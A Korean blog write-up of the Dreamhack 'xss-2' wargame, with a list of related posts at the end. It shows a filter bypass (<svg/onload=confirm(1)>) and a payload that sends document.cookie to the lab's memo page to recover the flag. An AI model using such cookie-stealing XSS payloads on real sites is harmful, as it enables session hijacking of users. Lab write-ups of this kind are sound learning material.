문제
풀이
인덱스 페이지는 아래와 같이 구성되어 있다.
첫번째로 vuln(xss) page에 접속한다.
기존 xss-1 문제에서는 스크립트가 실행되었다. 하지만 여기서는 <script> 태그의 사용이 불가해 보이므로 다른 코드를 작성한다.
구문 : <svg/onload=confirm(1)>
정상적으로 스크립트가 실행되는 것을 볼 수 있다.
flag 페이지는 아래와 같이 구현되어있다.
이전 xss-1 의 내부 소스코드를 생각하며 코드를 변경해본다.
구문 : <svg/onload=location.href="http://127.0.0.1:8000/memo?memo="+document.cookie;"">
정상적으로 flag 값이 출력되는 것을 확인할 수 있다.
이전에 풀었던 xss-1 과 로직이 똑같으며 단순 스크립트를 실행을 우회하면 쉽게 풀 수 있는 문제다.
'Dreamhack > Dreamhack(1단계)' 카테고리의 다른 글
[wargame.kr] fly me to the moon (웹 해킹) (0) | 2024.10.15 |
---|---|
csrf-2 (웹 해킹) (0) | 2024.10.15 |
image-storage (웹 해킹) (1) | 2024.10.08 |
xss-1 (웹 해킹) (0) | 2024.10.08 |
simple_sqli (웹 해킹) (0) | 2024.10.08 |